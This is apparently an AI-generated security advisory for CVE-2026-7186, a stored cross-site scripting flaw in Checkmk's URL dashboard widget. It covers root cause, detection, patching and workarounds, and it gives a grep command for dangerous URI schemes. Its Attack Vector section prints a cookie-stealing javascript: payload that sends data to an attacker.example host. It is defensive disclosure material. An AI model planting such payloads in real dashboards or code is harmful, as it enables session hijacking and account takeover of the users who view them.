CVE-2026-7186 Overview
CVE-2026-7186 is a stored cross-site scripting (XSS) vulnerability [CWE-79] in the URL dashboard widget of Checkmk. A user with dashboard editing permissions can save a URL containing a dangerous URI scheme such as javascript:. When other users view the affected dashboard, the embedded script executes in their browser session. The flaw affects Checkmk versions prior to 2.5.0p5, 2.4.0p31, 2.3.0p48, and all 2.2.0 releases. Successful exploitation can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of victim users in the monitoring console.
Critical Impact
An authenticated low-privilege user can execute arbitrary JavaScript in the browsers of administrators and operators who view a poisoned dashboard, enabling account takeover of the monitoring platform.
Affected Products
- Checkmk versions 2.2.0 (all releases, including betas and patch levels p1–p47)
- Checkmk 2.3.0 through 2.3.0p47
- Checkmk 2.4.0 through 2.4.0p30 and Checkmk 2.5.0 through 2.5.0p4
Discovery Timeline
- 2026-06-08 - CVE-2026-7186 published to NVD
- 2026-06-08 - Last updated in NVD database
Technical Details for CVE-2026-7186
Vulnerability Analysis
The URL dashboard widget in Checkmk allows users with dashboard editing permissions to embed remote content by specifying a URL. The widget accepts URL values without validating the scheme against an allow-list of safe protocols such as http and https. An attacker with edit rights can supply a javascript: URI, which is then rendered in the dashboard and executed when another user loads the view.
Because the payload is stored server-side in the dashboard configuration, the attack is persistent. Every user with permission to view the dashboard triggers the script on render, including administrators. The executed JavaScript runs in the origin of the Checkmk web interface and has full access to the victim's session cookies, CSRF tokens, and DOM.
Root Cause
The root cause is insufficient input validation on URL values stored in dashboard widget configurations. The application does not enforce a scheme allow-list, allowing pseudo-protocols such as javascript:, data:, or vbscript: to be persisted and later interpreted by the browser as executable code rather than as a navigable resource.
Attack Vector
Exploitation requires an authenticated account with dashboard editing permissions. The attacker creates or modifies a dashboard, adds a URL widget, and sets the URL field to a payload such as javascript:fetch('https://attacker.example/steal?c='+document.cookie). When a higher-privileged user opens the dashboard, the script executes in their authenticated session. The attacker can then exfiltrate session data, pivot to administrative actions through the Checkmk web API, or modify monitoring configuration to mask malicious activity in the underlying infrastructure.
No public proof-of-concept exploit is currently listed, and the vulnerability is not present on the CISA Known Exploited Vulnerabilities catalog.
Detection Methods for CVE-2026-7186
Indicators of Compromise
- Dashboard widget configuration entries containing URL values that begin with javascript:, data:, or vbscript: instead of http:// or https://.
- Outbound HTTP requests from operator browsers to unexpected external hosts immediately after loading a Checkmk dashboard.
- Unexpected modifications to dashboards or monitoring objects performed under administrator accounts shortly after dashboard views.
Detection Strategies
- Audit existing Checkmk dashboard definitions on disk and in the site configuration for URL widgets that contain non-HTTP(S) schemes.
- Review Checkmk audit logs for dashboard create and edit events performed by non-administrative users prior to the patched release.
- Inspect web proxy and DNS logs for connections from internal workstations to unfamiliar domains correlated with access to the Checkmk web UI.
Monitoring Recommendations
- Alert on any Checkmk dashboard configuration changes made by accounts that do not normally edit dashboards.
- Monitor browser-originated traffic from administrative consoles for anomalous outbound requests following Checkmk authentication sessions.
- Enable and forward Checkmk web.log and audit log events to a centralized SIEM for correlation with identity and network telemetry.
How to Mitigate CVE-2026-7186
Immediate Actions Required
- Upgrade Checkmk to a fixed release: 2.5.0p5, 2.4.0p31, 2.3.0p48, or later. The 2.2.0 branch is affected in all versions and should be migrated to a supported, patched branch.
- Review and remove any dashboard URL widgets that contain non-HTTP(S) schemes before exposing patched systems to users.
- Restrict the general.edit_dashboards permission to a minimal set of trusted administrative roles until patching is complete.
Patch Information
Checkmk has released fixed builds documented in the vendor advisory. Refer to the Checkmk Werk 17991 Advisory for upgrade instructions and the full list of patched releases. The fix enforces URL scheme validation on dashboard widget input so that pseudo-protocols such as javascript: are rejected.
Workarounds
- Revoke dashboard editing rights from non-administrative users until the patch is applied.
- Manually inspect and sanitize stored dashboard configurations to remove URL values that do not begin with http:// or https://.
- Deploy a strict Content Security Policy at the reverse proxy in front of Checkmk that blocks inline script execution and javascript: navigation where feasible.
# Configuration example: search Checkmk site configuration for suspect URL widget values
grep -RniE "javascript:|data:|vbscript:" /omd/sites/*/var/check_mk/web/ \
| grep -i dashboard
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

